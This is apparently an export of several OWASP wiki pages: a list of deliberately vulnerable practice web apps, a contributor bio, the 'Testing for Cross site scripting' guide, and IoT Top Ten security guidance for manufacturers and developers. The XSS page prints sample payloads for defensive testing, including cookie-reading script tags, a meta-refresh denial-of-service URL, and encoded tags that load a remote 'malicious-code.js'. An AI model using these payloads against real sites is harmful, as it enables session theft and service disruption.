| [http://sourceforge.net/projects/peruggia/files/ download]
|
|
|-
| [https://code.google.com/p/puzzlemall/ Puzzlemall ]
| Java
| [https://code.google.com/p/puzzlemall/downloads/list download] [https://code.google.com/p/puzzlemall/downloads/list docs]
|
|
|-
| [https://www.owasp.org/index.php/OWASP_Rails_Goat_Project Rails Goat ]
| Ruby on Rails
| [https://github.com/OWASP/railsgoat/archive/master.zip download] [http://railsgoat.cktricky.com/getting_started.html docs]
| OWASP
|
|-
| [http://suif.stanford.edu/%7Elivshits/securibench/ SecuriBench]
| Java
|
| Stanford
|
|-
| [http://suif.stanford.edu/%7Elivshits/work/securibench-micro/ SecuriBench Micro]
| Java
| [http://suif.stanford.edu/~livshits/securibench/download.html download]
| Stanford
|
|-
| [https://www.owasp.org/index.php/OWASP_Security_Shepherd Security Shepherd]
| Java
| [https://sourceforge.net/projects/owaspshepherd/ download]
| OWASP
|
|-
| [https://github.com/sqlmapproject/testenv SQL injection test environment]
| PHP
|
|
| SQLmap Project
|-
| [https://github.com/Audi-1/sqli-labs SQLI-labs]
| PHP
| [https://github.com/Audi-1/sqli-labs/archive/master.zip download] [http://dummy2dummies.blogspot.com/ blog]
|
|
|-
| [https://github.com/SpiderLabs/SQLol SQLol ]
| PHP
| [https://github.com/SpiderLabs/SQLol/archive/master.zip download]
|
|
|-
| [https://github.com/SpiderLabs/SQLol SQLol ]
| PHP
| [https://github.com/SpiderLabs/SQLol/archive/master.zip download]
|
|
|-
| [https://github.com/sakti/twitterlike twitterlike ]
| PHP
| [https://github.com/sakti/twitterlike git repository]
| Sakti Dwi Cahyono
|
|-
| [http://www.nth-dimension.org.uk/blog.php?id=88 VulnApp ]
| .NET
| [http://projects.nth-dimension.org.uk/dir?d=VulnApp CVS download] [http://projects.nth-dimension.org.uk/rptview?rn=6 vulns]
|
|
|-
| [http://exploit.co.il/hacking/exploit-kb-vulnerable-web-app/ Vulnerable Web App]
|
|
| Exploit.co.il
|
|-
| [https://github.com/adamdoupe/WackoPicko WackoPicko ]
| PHP
| [https://github.com/adamdoupe/WackoPicko/zipball/master download] [http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf whitepaper]
|
|
|-
| [https://github.com/sectooladdict/wavsep WAVSEP - Web Application Vulnerability Scanner Evaluation Project ]
| Java
| [https://sourceforge.net/projects/wavsep/ download (builds)] [https://code.google.com/p/wavsep/downloads/list download (old)] [https://github.com/sectooladdict/wavsep/wiki wiki]
| Shay Chen
|
|-
| [https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project WebGoat ]
| Java
| [http://code.google.com/p/webgoat/downloads/list download] [https://www.owasp.org/index.php/WebGoat_User_and_Install_Guide_Table_of_Contents guide]
| OWASP
|
|-
| [https://www.owasp.org/index.php/WebGoatPHP WebGoatPHP ]
| PHP
| [https://github.com/OWASP/OWASPWebGoatPHP download] [https://github.com/OWASP/OWASPWebGoatPHP/blob/master/README.md guide]
| OWASP
|
|-
| [https://code.google.com/p/wivet/ WIVET - Web Input Vector Extractor Teaser]
|
| [http://www.webguvenligi.org/projeler/wivet download] [https://code.google.com/p/wivet/downloads/list?can=1&q= tests]
|
|
|-
| [https://github.com/s4n7h0/xvwa Xtreme Vulnerable Web Application (XVWA)]
| PHP/MySQL
| [https://github.com/s4n7h0/xvwa download]
| @s4n7h0, @samanL33T
|
|-
|}

User:Jason Haddix

2016-12-10T17:27:14Z

Jason Haddix:

Jason Haddix is a security researcher and consultant. Jason is the former the Director of Penetration Testing at Hewlett-Packard and Fortify Software and now works as the Head of Trust and Security at Bugcrowd. Jason performs and trains internal candidates on mobile penetration testing, black box web application auditing, network/infrastructural security assessments, cursory mainframe security analysis, cloud architecture reviews, wireless
network assessment, binary reverse engineering, and static analysis. He is also a semi-regular player on the capture the flag team Shellphish, an academic hacking group based out of the University of California, Santa Barbara.

Testing for Cross site scripting

2015-06-24T21:39:35Z

Jason Haddix: /* Related Security Activities */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br>
{{Template:OWASP Testing Guide v2}}

== Overview ==
[[Cross-site Scripting (XSS)]] attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

==Related Security Activities==

===Description of Cross-site scripting Vulnerabilities===

See the OWASP articles on [[Cross-site Scripting (XSS)]] Vulnerabilities and [[DOM Based XSS]].

===How to Avoid Cross-site scripting Vulnerabilities===

See the [[:Category:OWASP Guide Project|OWASP Guide]] article on [[Phishing|Phishing]].

===How to Review Code for Cross-site scripting Vulnerabilities===

See the [[:Category:OWASP Code Review Project|OWASP Code Review Guide]] article on how to [[Reviewing Code for Cross-site scripting|Reviewing code for Cross-site scripting]] Vulnerabilities.

===XSS Filter Evasion Cheat Sheet===

The [[XSS Filter Evasion Cheat Sheet]] is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing.

[[Category:Security Focus Area]]
__NOTOC__

== Description of the Issue ==
[[Category:FIXME|I think this whole section needs to be deleted]]

[[XSS]] attacks are essentially code injection attacks into the various interpreters in the browser. These attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash, and other client-side languages. These attacks also have the ability to gather data from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. In some cases, Cross Site Scripting vulnerabilities can perform other functions such as scanning for other vulnerabilities and performing a Denial of Service on your web server.

Cross Site Scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties (the attacker and the web site, or the attacker and the victim client) the XSS attack involves three parties -- the attacker, a client and the web site. The goal of the XSS attack is to steal the client cookies or any other sensitive information which can authenticate the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site, impersonating the user - Identity theft!

Online message boards, web logs, guestbooks, and user forums where messages can be permanently stored also facilitate Cross Site Scripting attacks. In these cases, an attacker can post a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the user once they click the link. Attackers can use a wide range of encoding techniques to hide or obfuscate the malicious script and, in some cases, can avoid explicit use of the <Script> tag. Typically, XSS attacks involve malicious JavaScript, but they can also involve any type of executable active content. Although the types of attacks vary in sophistication, there is a generally reliable method to detect XSS vulnerabilities. Cross Site Scripting is used in many Phishing attacks.

'''Now we explain the three types of Cross Site Scripting: Stored, Reflected, and DOM-Based.'''

The '''Stored Cross Site Scripting''' vulnerability is the most powerful kind of XSS attack. A Stored XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, filesystem, or other location), and later displayed to users in a web page without being encoded using HTML entity encoding. A real life example of this would be the Samy MySpace Worm, which exploited an XSS vulnerability found on MySpace in October of 2005.

These vulnerabilities are the most significant of the XSS types because an attacker can inject the script just once. This could potentially hit a large number of other users with little need for social engineering, or the web application could even be infected by a cross-site scripting virus.

'''Example'''

If we have a site that permits us to leave a message to the other user (a lesson of WebGoat v3.7), and we inject a script insted of a message in the following way:

<center>[[Image:XSSStored1.PNG]]</center>

Now the server will store this information and when a user clicks on our fake message, his browser will execute our script as follows:

<center>[[Image:XSSStored2.PNG]]</center>

The '''Reflected Cross-Site Scripting''' vulnerability is by far the most common and well-known type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If all occurrences of the search terms are not HTML entity encoded, an XSS hole will result.

At first glance, this does not appear to be a serious problem since users can only inject code into their own pages. However, with a small amount of social engineering, an attacker could convince a user to follow a malicious URL which injects code into the results page, giving the attacker full access to that page's content. Due to the general requirement of the use of some social engineering in this case (and normally in DOM-Based XSS vulnerabilities as well), many programmers have disregarded these holes as not terribly important. This misconception is sometimes applied to XSS holes in general (even though this is only one type of XSS) and there is often disagreement in the security community as to the importance of cross-site scripting vulnerabilities. The simplest way to show the importance of a XSS vulnerability would be to perform a Denial of Service attack.
In some cases a Denial of Service attack can be performed on the server by doing the following:

article.php?title=<meta%20http-equiv="refresh"%20content="0;">

This makes a refresh request roughly about every .3 seconds to particular page. It then acts like an infinite loop of refresh requests, potentially bringing down the web and database server by flooding it with requests. The more browser sessions that are open, the more intense the attack becomes.

The '''DOM-based Cross-Site Scripting''' problem exists within a page's client-side script itself. If the JavaScript accesses a URL request parameter (an example would be an RSS feed) and uses this information to write some HTML to its own page, and this information is not encoded using HTML entities, an XSS vulnerability will likely be present, since this written data will be re-interpreted by browsers as HTML which could include additional client-side script.
Exploiting such a hole would be very similar to the exploitation of Reflected XSS vulnerabilities, except in one very important situation.

For example, if an attacker hosts a malicious website which contains a link to a vulnerable page on a client's local system, a script could be injected and would run with privileges of that user's browser on their system. This bypasses the entire client-side sandbox, not just the cross-domain restrictions that are normally bypassed with XSS exploits.

The methods of injection can vary a great deal. A perfect example of how this type of an attack could impact an organization, instead of an individual, was demonstrated by Jeremiah Grossman @ BlackHat USA 2006. The demonstration gave an example of how posting a stored XSS script to a popular blog, newspaper, or page comments section of a website can cause all the visitors of that page to have their internal networks scanned and logged for a particular type of vulnerability.

==Black Box testing and example==

One way to test for XSS vulnerabilities is to verify whether an application or web server will respond to requests containing simple scripts with an HTTP response that could be executed by a browser. For example, Sambar Server (version 5.3) is a popular freeware web server with known XSS vulnerabilities. Sending the server a request such as the following generates a response from the server that will be executed by a web browser:<BR>

<nowiki>http://server/cgi-bin/testcgi.exe?<SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT></nowiki>

The script is executed by the browser because the application generates an error message containing the original script, and the browser interprets the response as an executable script originating from the server.
All web servers and web applications are potentially vulnerable to this type of misuse, and preventing such attacks is extremely difficult.

'''Example 1:'''

Since JavaScript is case sensitive, some people attempt to filter XSS by converting all characters to upper case, rendering Cross Site Scripting utilizing inline JavaScript useless. If this is the case, you may want to use VBScript since it is not a case sensitive language.

JavaScript:

<script>alert(document.cookie);</script>

VBScript:

<script type="text/vbscript">alert(DOCUMENT.COOKIE)</script>

Also, you can use the SRC attribute to load the attacker's JavaScript from an external site (see Example 2 below), causing the JavaScript payload to be loaded directly and bypassing capitalization effects altogether.

'''Example 2:'''

If they are filtering for the < or the open of <script or closing of script> you should try various methods of encoding:

<nowiki><script src=http://www.example.com/malicious-code.js></script></nowiki>

<nowiki>%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e</nowiki>

<nowiki>\x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e</nowiki>

You can find more examples of XSS Injection here: http://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors

== References ==

'''Whitepapers'''<br>

* RSnake: "XSS (Cross Site Scripting) Cheat Sheet" - http://ha.ckers.org/xss.html

* Jeremiah Grossman: "Hacking Intranet Websites from the Outside "JavaScript malware just got a lot more dangerous"" - http://www.blackhat.com/presentations/bh-jp-06/BH-JP-06-Grossman.pdf

* Amit Klien: "DOM Based Cross Site Scripting" - http://www.securiteam.com/securityreviews/5MP080KGKW.html

* Paul Lindner: "Preventing Cross-site Scripting Attacks" - http://www.perl.com/pub/a/2002/02/20/css.html

* CERT: "CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests" - http://www.cert.org/advisories/CA-2000-02.html

* Aung Khant: "What XSS Can do - Benefits of XSS From Attacker's view" - http://yehg.net/lab/pr0js/papers/What%20XSS%20Can%20Do.pdf

'''Tools'''

* '''OWASP CAL9000''' - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more. It's hosted at: http://sec101.sourceforge.net/CAL9000/

* '''PHP Charset Encoder(PCE)''' - http://yehg.net/encoding
PCE helps you encode arbitrary texts to and from 65 kinds of charsets that you can use in your customized payloads.

* '''HackVector(HVR)''' - http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php

{{Category:OWASP Testing Project AoC}}

OWASP Internet of Things Top Ten Project

2015-05-01T19:58:15Z

Jason Haddix: /* Feedback */

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

==OWASP Internet of Things Top 10==

Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”

''The OWASP Internet of Things (IoT) Top 10 is a project designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''.

The project defines the top ten security surface areas presented by IoT systems, and provides information on threat agents, attack vectors, vulnerabilities, and impacts associated with each. In addition, the project aims to provide practical security recommendations for builders, breakers, and users of IoT systems.

==Licensing==
The OWASP Internet of Things Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the OWASP Internet of Things Top 10? ==

The OWASP Internet of Things Top 10 provides:

* A list of the 10 Most Significant IoT Security Surface Areas
* A list of basic recommendations for manufacturers, developers, and consumers

For each attack surface areas, the following sections are included:

* A description of the attack surface
* Threat agents
* Attack vectors
* Security weaknesses
* Technical impacts
* Business impacts
* Example vulnerabilities
* Example attacks
* Guidance on how to avoid the issue
* References to OWASP and other related resources

For each role in Manufacturers, Developers, and Consumer, the following recommendations are included:

* For each I''N'' category, list the top few considerations that should be observed in that context

== Project Leaders ==

* Daniel Miessler
* Craig Smith
* Jason Haddix

== Related Projects ==

* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]

| valign="top" style="padding-left:25px;width:200px;" |

== Quick Download ==
[https://drive.google.com/file/d/0B52IUvO0LP6OZEpHalF3cDFlWWs/view?usp=sharing OWASP Internet of Things Top Ten 2014 PDF]

[https://drive.google.com/file/d/0B52IUvO0LP6OYVoweHNBeVFDdGs/view?usp=sharing OWASP Internet of Things Top Ten 2014 Infographic]

[https://drive.google.com/file/d/0B52IUvO0LP6OdW1HMjRpM3VVUVE/view?usp=sharing OWASP IoT Top Ten RSA 2015 Presentation]

== Email List ==
[[https://lists.owasp.org/mailman/listinfo/owasp_internet_of_things_top_ten_project Subcribe here]]

== News and Events ==
* [April 2015] Added the IoT Top 10 talk from RSA
* [April 2015] Added an IoT Top 10 Infographic
* IoT day is April 9th!
* [February 2015] Added a PDF containing a walk through of the project and the Top Ten.

==Classifications==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]
|}

|}

= OWASP Internet of Things Top 10 for 2014 =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

The OWASP Internet of Things Top 10 - 2014 is as follows:

* [[Top_10_2014-I1 Insecure Web Interface | I1 Insecure Web Interface]]
* [[Top_10_2014-I2 Insufficient Authentication/Authorization | I2 Insufficient Authentication/Authorization]]
* [[Top_10_2014-I3 Insecure Network Services | I3 Insecure Network Services]]
* [[Top_10_2014-I4 Lack of Transport Encryption | I4 Lack of Transport Encryption]]
* [[Top_10_2014-I5 Privacy Concerns | I5 Privacy Concerns]]
* [[Top_10_2014-I6 Insecure Cloud Interface | I6 Insecure Cloud Interface]]
* [[Top_10_2014-I7 Insecure Mobile Interface | I7 Insecure Mobile Interface]]
* [[Top_10_2014-I8 Insufficient Security Configurability | I8 Insufficient Security Configurability]]
* [[Top_10_2014-I9 Insecure Software/Firmware | I9 Insecure Software/Firmware]]
* [[Top_10_2014-I10 Poor Physical Security | I10 Poor Physical Security]]

== Introduction ==

Oxford defines the Internet of Things as “a proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”

The OWASP Internet of Things (IoT) Top 10 is a project designed to help vendors who are interested in making common appliances and gadgets network/Internet accessible. The project walks through the top ten security problems that are seen with IoT devices, and how to prevent them.

Examples of IoT Devices: Cars, lighting systems, refrigerators, telephones, SCADA systems, traffic control systems, home security systems, TVs, DVRs, etc…

== Feedback ==

Please let us know how your organization is using the Internet of Things Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP!

We hope you find the information in the OWASP Internet of Things Top Ten useful. Please contribute back to the project by sending your comments, questions, and suggestions to Daniel.Miessler@owasp.org, Craig.Smith@owasp.org, or Jason.Haddix@owasp.org, Thanks!

== Project Sponsors ==

* [http://www8.hp.com/us/en/software-solutions/fortify-on-demand-application-security/ HP Fortify on Demand]
* Contribute and add your name here!



= Talks =

RSA Conference San Francisco <br>
[https://drive.google.com/file/d/0B52IUvO0LP6OdW1HMjRpM3VVUVE/view?usp=sharing Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br>
Daniel Miessler, Practice Principal <br>
April 21, 2015

= In the News =

* [http://www.forbes.com/sites/joemckendrick/2015/03/25/is-the-internet-of-things-heralding-the-next-great-economic-shift/ "Why the Internet of Things Heralds the Next Great Economic Disruption"] ''Forbes.'' Forbes 25 March 2015
* [http://www.fastcompany.com/3044046/tech-forecast/welcome-to-privacy-hell-otherwise-known-as-the-internet-of-things "Welcome to Privacy Hell, Also Known As the Internet of Things"] ''FastCompany.'' FastCompany 23 March 2015
* [http://www.nextgov.com/emerging-tech/2015/03/senate-passes-resolution-national-strategy-internet-things/108358/ "Senate Passes Resolution for National Strategy on Internet of Things"] ''Nextgov.'' Nextgov 25 March 2015
* [http://www.techhive.com/article/2901042/ftc-wants-to-keep-closer-watch-on-the-internet-of-things.html "FTC wants to keep closer watch on the Internet of Things"] ''TechHive.'' TechHive 24 March 2015
* [http://www.esecurityplanet.com/network-security/6-tips-for-developing-secure-iot-apps.html "6 Tips for Developing Secure IoT Apps"] ''eSecurity Planet.'' eSecurity Planet 26 February 2015
* [http://www.cmswire.com/cms/internet-of-things/6-reasons-hackers-love-the-internet-of-things-028074.php "6 Reasons Hackers Love the Internet of Things"] ''CMS Wire.'' CMS Wire 13 February 2015
* [http://www.zdnet.com/article/frankenbeast-thats-hps-considered-view-of-the-lack-of-security-of-the-internet-of-things "Fighting the Frankenbeast: How to stop security fears slowing the Internet of Things"] ''ZDNET.'' ZDNET 12 February 2015
* [http://mobileenterprise.edgl.com/news/IoT-Security-is-Not-One-Dimensional97740 "IoT Security is Not One-Dimensional"] ''Mobile Enterprise.'' Mobile Enterprise 27 January 2015
* [http://www.choice.com.au/media-and-news/consumer-news/news/smart-home-security-threats-151214.aspx "Smart Santa a security nightmare"] ''Choice.'' Choice 15 December 2014
* [http://www.zdnet.com/article/internet-of-things-rich-with-folly-ripe-with-concerns "Internet of Things rich with folly, ripe with concerns"] ''ZDNET.'' ZDNET 12 November 2014
* [https://devcentral.f5.com/articles/internet-of-things-owasp-top-10 "Internet of Things OWASP Top 10"] ''F5 DevCentral.'' F5 DevCentral, 30 July 2014
* [http://resources.infosecinstitute.com/test-security-iot-smart-devices/ "Testing the Security of Smart Devices with the OWASP Top Ten"] ''Infosec Institute.'' Infosec Institute 10 November 2014
* [https://www.virtual.com/blog/detail/internet-of-things-iot-security-resource-owasp-top-10/269 "Internet of Things (IoT) Security Resource: OWASP Top 10"] ''Advanced Systems Group.'' Advanced Systems Group 28 August 2014

= IoT Conferences - April 2015=

* [https://open.sap.com/courses/iot1 How the Internet of Things and Smart Services will Change Society] Walldorf, Germany March 25 - May 05
* [http://issnip2015.org/#/ IEEE ISSNIP 2015] Singapore April 7 - April 10
* [http://www.issnip.org/riot2015/ 2015 International Conference on Recent Advances in Internet of Things (RIoT)] Singapore April 7
* [http://www.sido-event.com/en/event-connected-objects-lyon-france.html SIdO - The Connected Business] Lyon, France April 7 - April 8
* [http://www.internetofthingsasia.com/events/iot-asia-2015/event-summary-2fae431387124a1d9981c93c3f9e87dc.aspx IoT Asia] April 8 - April 9
* [http://iotday.org/events/map/ IoT Day Events] April 9
* [http://www.iot-vienna.at/global-iot-day-event/2015/doku.php Global IoT Day Event Vienna 2015] Wien, Austria April 9
* [http://nordiciothackathon.com Nordic IoT Hackathon 2015] Lund, Sweden April 10 - April 12
* [http://ontolog-02.cim3.net/wiki/OntologySummit2015 Ontology Summit 2015 : Internet of Things: Toward Smart Networked Systems and Societies] Arlington, US April 13
* [http://www.arena-international.com/iot/ Monetising the Internet of Things 2015] Frankfurt am Main, Germany April 15 - April 16
* [http://www.truste.com/events/iot/ IoT Privacy Summit 2015] Mountain View, US April 18
* [http://iot.streamconf.com IoT Stream Conference] San Francisco, US April 23
* [http://theinnovationenterprise.com/summits/internet-of-things-summit-san-jose-2015 2015 Internet of Things Summit] San Jose, US April 28 - April 29

= Community =

[https://www.iamthecavalry.org/ I Am The Cavalry]

A global grassroots organization that is focused on issues where computer security intersects public safety and human life.

Their areas of focus include:
* Medical devices
* Automobiles
* Home Electronics
* Public Infrastructure
== ==
[https://ifttt.com/ If This Then That (IFTTT)]

A service that lets you create powerful connections with one simple statement.

Channels are the basic building blocks of IFTTT. Channels include:
* Triggers - The ''this'' part of a Recipe
* Actions - The ''that'' part of a Recipe
== ==
[http://builditsecure.ly BuildItSecure.ly]

A project focused on helping small business connect with security researchers to aid in securing their IoT-based products before going market.

Their goals include:
* Focus effort towards small business
* Build partnerships
* Coordinate efforts
* Curate informational resources
* Present research

= Manufacturers =

== Manufacturer IoT Security Guidance ==

(DRAFT)

The goal of this page is help manufacturers build more secure products in the Internet of Things space. The guidance below is at a basic level, giving builders of products a basic set of guidelines to consider from their perspective. This is not a comprehensive list of considerations, and should not be treated as such, but ensuring that these fundamentals are covered will greatly improve the security of any IoT product.

{| border="1" class="wikitable" style="text-align: left"
! Category
! IoT Security Consideration
|-
| '''I1: Insecure Web Interface'''
|
* Ensure that any web interface in the product disallows weak passwords
* Ensure that any web interface in the product has an account lockout mechanism
* Ensure that any web interface in the product has been tested for XSS, SQLi and CSRF vulnerabilities
* Ensure that any web interface has the ability to use HTTPS to protect transmitted information
* Include web application firewalls to protect any web interfaces
* Ensure that any web interface allows the owner to change the default username and password
|-
| '''I2: Insufficient Authentication/Authorization'''
|
* Ensure that any access requiring authentication requires strong passwords
* Ensure that user roles can be properly segregated in multi-user environments
* Implement two-factor authentication where possible
* Ensure password recovery mechanisms are secure
* Ensure that users have the option to require strong passwords
* Ensure that users have the option to force password expiration after a specific period
* Ensure that users have the option to change the default username and password
|-
| '''I3: Insecure Network Services'''
|
* Ensure all devices operate with a minimal number of network ports active
* Ensure all devices do not make network ports and/or services available to the internet via UPnP for example
* Review all required network services for vulnerabilities such as buffer overflows or denial of service
|-
| '''I4: Lack of Transport Encryption'''
|
* Ensure all communication between system components is encrypted as well as encrypting traffic between the system or device and the internet
* Use recommended and accepted encryption practices and avoid proprietary protocols
* Ensure SSL/TLS implementations are up to date and properly configured
* Consider making a firewall option available for the product
|-
| '''I5: Privacy Concerns'''
|
* Ensure only the minimal amount of personal information is collected from consumers
* Ensure all collected personal data is properly protected using encryption at rest and in transit
* Ensure only authorized individuals have access to collected personal information
* Ensure only less sensitive data is collected
* Ensuring data is de-identified or anonymized
* Ensuring a data retention policy is in place
* Ensuring end-users are given a choice for data collected beyond what is needed for proper operation of the device
|-
| '''I6: Insecure Cloud Interface'''
|
* Ensure all cloud interfaces are reviewed for security vulnerabilities (e.g. API interfaces and cloud-based web interfaces)
* Ensure that any cloud-based web interface disallows weak passwords
* Ensure that any cloud-based web interface has an account lockout mechanism
* Implement two-factor authentication for cloud-based web interfaces
* Ensure that all cloud interfaces use transport encryption
* Ensure that any cloud-based web interface has been tested for XSS, SQLi and CSRF vulnerabilities
* Ensure that users have the option to require strong passwords
* Ensure that users have the option to force password expiration after a specific period
* Ensure that users have the option to change the default username and password
|-
| '''I7: Insecure Mobile Interface'''
|
* Ensure that any mobile application disallows weak passwords
* Ensure that any mobile application has an account lockout mechanism
* Implement two-factor authentication for mobile applications (e.g Apple's Touch ID)
* Ensure that any mobile application uses transport encryption
* Ensure that users have the option to require strong passwords
* Ensure that users have the option to force password expiration after a specific period
* Ensure that users have the option to change the default username and password
|-
| '''I8: Insufficient Security Configurability'''
|
* Ensure password security options are made available (e.g. Enabling 20 character passwords or enabling two-factor authentication)
* Ensure encryption options are made available (e.g. Enabling AES-256 where AES-128 is the default setting)
* Ensure secure logging is available for security events
* Ensure alerts and notifications are available to the user for security events
|-
| '''I9: Insecure Software/Firmware'''
|
* Ensure all system devices have update capability and can be updated quickly when vulnerabilities are discovered
* Ensure update files are encrypted and that the files are also transmitted using encryption
* Ensure that update files are signed and then validated by the device before installing
* Ensure update servers are secure
* Ensure the product has the ability to implement scheduled updates
|-
| '''I10: Poor Physical Security'''
|
* Ensure the device is produced with a minimal number of physical external ports (e.g. USB ports)
* Ensure the firmware of Operating System can not be accessed via unintended methods such as through an unnecessary USB port
* Ensure the product is tamper resistant
* Ensure the product has the ability to limit administrative capabilities in some fashion, possibly by only connecting locally for admin functions
* Ensure the product has the ability to disable external ports such as USB
|}

===General Recommendations===

Consider the following recommendation for all Internet of Things products:
* Avoid the potential for persistent vulnerabilities in devices that have no update capability by ensuring that all devices and systems are built with the ability to be updated when vulnerabilities are discovered
* Rebranded devices used as part of a system should be properly configured so that unnecessary or unintended services do not remain active after the rebranding

[ NOTE: Given the fact that each deployment and every environment is different, it is important to weigh the pros and cons of implementing the advice above before taking each step. ]

= Developers =

== Developer IoT Security Guidance ==

(DRAFT)

The goal of this page is help developers build more secure applications in the Internet of Things space. The guidance below is at a basic level, giving developers of applications a basic set of guidelines to consider from their perspective. This is not a comprehensive list of considerations, and should not be treated as such, but ensuring that these fundamentals are covered will greatly improve the security of any IoT product.

{| border="1" class="wikitable" style="text-align: left"
! Category
! IoT Security Consideration
|-
| '''I1: Insecure Web Interface'''
|
* Ensure that any web interface coding is written to prevent the use of weak passwords
* Ensure that any web interface coding is written to include an account lockout mechanism
* Ensure that any web interface coding has been tested for XSS, SQLi and CSRF vulnerabilities
* Ensure that any web interface has the ability to use HTTPS to protect transmitted information
* Ensure that any web interface coding is written to allow the owner to change the username and password
* Consider the use of web application firewalls to protect any web interfaces
|-
| '''I2: Insufficient Authentication/Authorization'''
|
* Ensure that applications are written to require strong passwords where authentication is needed
* Ensure the application takes into account multi-user environments and includes functionality for role separation
* Implement two-factor authentication where possible
* Ensure password recovery mechanisms are written to function in a secure manner
* Ensure that applications are written to include the option to require strong passwords
* Ensure that applications are written to include the option to force password expiration after a specific period
* Ensure that applications are written to include the option to change the default username and password
|-
| '''I3: Insecure Network Services'''
|
* Ensure applications that use network services don't respond poorly to buffer overflow, fuzzing or denial of service attacks
* Ensure applications test ports are taken out of service before going to production
|-
| '''I4: Lack of Transport Encryption'''
|
* Ensure all applications are written to make use of encrypted communication between devices and between devices and the internet
* Use recommended and accepted encryption practices and avoid proprietary protocols
* Consider making a firewall option available for the application
|-
| '''I5: Privacy Concerns'''
|
* Ensure only the minimal amount of personal information is collected from consumers
* Ensure all collected personal data is properly protected using encryption at rest and in transit
* Ensuring data is de-identified or anonymized
* Ensuring end-users are given a choice for data collected beyond what is needed for proper operation of the device
|-
| '''I6: Insecure Cloud Interface'''
|
* Ensure all cloud interfaces are reviewed for security vulnerabilities (e.g. API interfaces and cloud-based web interfaces)
* Ensure that any cloud-based web interface coding is written to disallows weak passwords
* Ensure that any cloud-based web interface coding is written to include an account lockout mechanism
* Implement two-factor authentication for cloud-based web interfaces
* Ensure that any cloud interface coding has been tested for XSS, SQLi and CSRF vulnerabilities
* Ensure that all cloud interfaces use transport encryption
* Ensure that any cloud interface coding is written to allow the owner to change the username and password
* Ensure that cloud interfaces are written to include the option to require strong passwords
* Ensure that cloud interfaces are written to include the option to force password expiration after a specific period
* Ensure that cloud interfaces are written to include the option to change the default username and password
|-
| '''I7: Insecure Mobile Interface'''
|
* Ensure that any mobile application coding is written to disallows weak passwords
* Ensure that any mobile application coding is written to include an account lockout mechanism
* Implement two-factor authentication for mobile applications (e.g Apple's Touch ID)
* Ensure that any mobile application uses transport encryption
* Ensure that mobile interfaces are written to include the option to require strong passwords
* Ensure that mobile interfaces are written to include the option to force password expiration after a specific period
* Ensure that mobile interfaces are written to include the option to change the default username and password
* Ensure that mobile interfaces only collect the minimum amount of personal information needed
|-
| '''I8: Insufficient Security Configurability'''
|
* Ensure applications are written to include password security options (e.g. Enabling 20 character passwords or enabling two-factor authentication)
* Ensure applications are written to include encryption options (e.g. Enabling AES-256 where AES-128 is the default setting)
* Ensure all applications are written to produce logs for security events
* Ensure all applications are written to produce alerts and notifications to the user for security events
|-
| '''I9: Insecure Software/Firmware'''
|
* Ensure all applications are written to include update capability and can be updated quickly when vulnerabilities are discovered
